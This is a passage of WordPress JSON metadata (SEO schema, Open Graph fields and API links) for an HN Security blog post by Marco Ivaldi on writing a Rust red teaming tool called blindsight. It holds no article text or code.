encore\",\"datePublished\":\"2024-12-10T07:28:16+00:00\",\"dateModified\":\"2025-10-21T09:08:11+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/an-offensive-rust-encore\\\/\"},\"wordCount\":1513,\"publisher\":{\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/an-offensive-rust-encore\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/hnsecurity.it\\\/wp-content\\\/uploads\\\/2025\\\/09\\\/RUST.jpg\",\"keywords\":[\"mimikatz\",\"minidump\",\"tactical exploitation\",\"windows\",\"red teaming\",\"rust\"],\"articleSection\":[\"Tools\",\"Articles\"],\"inLanguage\":\"it-IT\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/an-offensive-rust-encore\\\/\",\"url\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/an-offensive-rust-encore\\\/\",\"name\":\"HN Security - An offensive Rust encore -\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/an-offensive-rust-encore\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/an-offensive-rust-encore\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/hnsecurity.it\\\/wp-content\\\/uploads\\\/2025\\\/09\\\/RUST.jpg\",\"datePublished\":\"2024-12-10T07:28:16+00:00\",\"dateModified\":\"2025-10-21T09:08:11+00:00\",\"description\":\"Offensive Rust series article that introduces new learning resources and walks through the implementation of a red teaming tool 
(blindsight).\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/an-offensive-rust-encore\\\/#breadcrumb\"},\"inLanguage\":\"it-IT\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/an-offensive-rust-encore\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/an-offensive-rust-encore\\\/#primaryimage\",\"url\":\"https:\\\/\\\/hnsecurity.it\\\/wp-content\\\/uploads\\\/2025\\\/09\\\/RUST.jpg\",\"contentUrl\":\"https:\\\/\\\/hnsecurity.it\\\/wp-content\\\/uploads\\\/2025\\\/09\\\/RUST.jpg\",\"width\":1600,\"height\":836,\"caption\":\"Rust logo\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/an-offensive-rust-encore\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"An offensive Rust encore\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/#website\",\"url\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/\",\"name\":\"HN Security\",\"description\":\"Offensive Security Specialists\",\"publisher\":{\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"it-IT\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/#organization\",\"name\":\"HN 
Security\",\"url\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/hnsecurity.it\\\/wp-content\\\/uploads\\\/2026\\\/01\\\/hn-libellula.jpg\",\"contentUrl\":\"https:\\\/\\\/hnsecurity.it\\\/wp-content\\\/uploads\\\/2026\\\/01\\\/hn-libellula.jpg\",\"width\":696,\"height\":696,\"caption\":\"HN Security\"},\"image\":{\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/hnsec\",\"https:\\\/\\\/www.linkedin.com\\\/company\\\/hnsecurity\\\/\",\"https:\\\/\\\/github.com\\\/hnsecurity\",\"https:\\\/\\\/infosec.exchange\\\/@hnsec\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/#\\\/schema\\\/person\\\/89a4174c275f05d6148fb0fdedc8de4f\",\"name\":\"Marco Ivaldi\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/a8a96db06e7315a061d28b320ee7bb4c9d0f1535c58bf0f54218bf8a7569bea0?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/a8a96db06e7315a061d28b320ee7bb4c9d0f1535c58bf0f54218bf8a7569bea0?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/a8a96db06e7315a061d28b320ee7bb4c9d0f1535c58bf0f54218bf8a7569bea0?s=96&d=mm&r=g\",\"caption\":\"Marco Ivaldi\"},\"url\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/author\\\/marco-ivaldi\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. 
-->","yoast_head_json":{"title":"HN Security - An offensive Rust encore -","description":"Offensive Rust series article that introduces new learning resources and walks through the implementation of a red teaming tool (blindsight).","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/hnsecurity.it\/it\/blog\/an-offensive-rust-encore\/","og_locale":"it_IT","og_type":"article","og_title":"HN Security - An offensive Rust encore -","og_description":"Offensive Rust series article that introduces new learning resources and walks through the implementation of a red teaming tool (blindsight).","og_url":"https:\/\/hnsecurity.it\/it\/blog\/an-offensive-rust-encore\/","og_site_name":"HN Security","article_published_time":"2024-12-10T07:28:16+00:00","article_modified_time":"2025-10-21T09:08:11+00:00","og_image":[{"width":1600,"height":836,"url":"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/09\/RUST.jpg","type":"image\/jpeg"}],"author":"Marco Ivaldi","twitter_card":"summary_large_image","twitter_creator":"@hnsec","twitter_site":"@hnsec","twitter_misc":{"Scritto da":"Marco Ivaldi","Tempo di lettura stimato":"8 minuti"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/hnsecurity.it\/it\/blog\/an-offensive-rust-encore\/#article","isPartOf":{"@id":"https:\/\/hnsecurity.it\/it\/blog\/an-offensive-rust-encore\/"},"author":{"name":"Marco Ivaldi","@id":"https:\/\/hnsecurity.it\/it\/#\/schema\/person\/89a4174c275f05d6148fb0fdedc8de4f"},"headline":"An offensive Rust 
encore","datePublished":"2024-12-10T07:28:16+00:00","dateModified":"2025-10-21T09:08:11+00:00","mainEntityOfPage":{"@id":"https:\/\/hnsecurity.it\/it\/blog\/an-offensive-rust-encore\/"},"wordCount":1513,"publisher":{"@id":"https:\/\/hnsecurity.it\/it\/#organization"},"image":{"@id":"https:\/\/hnsecurity.it\/it\/blog\/an-offensive-rust-encore\/#primaryimage"},"thumbnailUrl":"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/09\/RUST.jpg","keywords":["mimikatz","minidump","tactical exploitation","windows","red teaming","rust"],"articleSection":["Tools","Articles"],"inLanguage":"it-IT"},{"@type":"WebPage","@id":"https:\/\/hnsecurity.it\/it\/blog\/an-offensive-rust-encore\/","url":"https:\/\/hnsecurity.it\/it\/blog\/an-offensive-rust-encore\/","name":"HN Security - An offensive Rust encore -","isPartOf":{"@id":"https:\/\/hnsecurity.it\/it\/#website"},"primaryImageOfPage":{"@id":"https:\/\/hnsecurity.it\/it\/blog\/an-offensive-rust-encore\/#primaryimage"},"image":{"@id":"https:\/\/hnsecurity.it\/it\/blog\/an-offensive-rust-encore\/#primaryimage"},"thumbnailUrl":"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/09\/RUST.jpg","datePublished":"2024-12-10T07:28:16+00:00","dateModified":"2025-10-21T09:08:11+00:00","description":"Offensive Rust series article that introduces new learning resources and walks through the implementation of a red teaming tool (blindsight).","breadcrumb":{"@id":"https:\/\/hnsecurity.it\/it\/blog\/an-offensive-rust-encore\/#breadcrumb"},"inLanguage":"it-IT","potentialAction":[{"@type":"ReadAction","target":["https:\/\/hnsecurity.it\/it\/blog\/an-offensive-rust-encore\/"]}]},{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/hnsecurity.it\/it\/blog\/an-offensive-rust-encore\/#primaryimage","url":"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/09\/RUST.jpg","contentUrl":"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/09\/RUST.jpg","width":1600,"height":836,"caption":"Rust 
logo"},{"@type":"BreadcrumbList","@id":"https:\/\/hnsecurity.it\/it\/blog\/an-offensive-rust-encore\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/hnsecurity.it\/it\/"},{"@type":"ListItem","position":2,"name":"An offensive Rust encore"}]},{"@type":"WebSite","@id":"https:\/\/hnsecurity.it\/it\/#website","url":"https:\/\/hnsecurity.it\/it\/","name":"HN Security","description":"Offensive Security Specialists","publisher":{"@id":"https:\/\/hnsecurity.it\/it\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/hnsecurity.it\/it\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"it-IT"},{"@type":"Organization","@id":"https:\/\/hnsecurity.it\/it\/#organization","name":"HN Security","url":"https:\/\/hnsecurity.it\/it\/","logo":{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/hnsecurity.it\/it\/#\/schema\/logo\/image\/","url":"https:\/\/hnsecurity.it\/wp-content\/uploads\/2026\/01\/hn-libellula.jpg","contentUrl":"https:\/\/hnsecurity.it\/wp-content\/uploads\/2026\/01\/hn-libellula.jpg","width":696,"height":696,"caption":"HN Security"},"image":{"@id":"https:\/\/hnsecurity.it\/it\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/hnsec","https:\/\/www.linkedin.com\/company\/hnsecurity\/","https:\/\/github.com\/hnsecurity","https:\/\/infosec.exchange\/@hnsec"]},{"@type":"Person","@id":"https:\/\/hnsecurity.it\/it\/#\/schema\/person\/89a4174c275f05d6148fb0fdedc8de4f","name":"Marco 
Ivaldi","image":{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/secure.gravatar.com\/avatar\/a8a96db06e7315a061d28b320ee7bb4c9d0f1535c58bf0f54218bf8a7569bea0?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/a8a96db06e7315a061d28b320ee7bb4c9d0f1535c58bf0f54218bf8a7569bea0?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/a8a96db06e7315a061d28b320ee7bb4c9d0f1535c58bf0f54218bf8a7569bea0?s=96&d=mm&r=g","caption":"Marco Ivaldi"},"url":"https:\/\/hnsecurity.it\/it\/blog\/author\/marco-ivaldi\/"}]}},"jetpack_featured_media_url":"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/09\/RUST.jpg","_links":{"self":[{"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/posts\/3576","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/comments?post=3576"}],"version-history":[{"count":4,"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/posts\/3576\/revisions"}],"predecessor-version":[{"id":161117,"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/posts\/3576\/revisions\/161117"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/media\/159953"}],"wp:attachment":[{"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/media?parent=3576"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/categories?post=3576"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/tags?post=3576"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}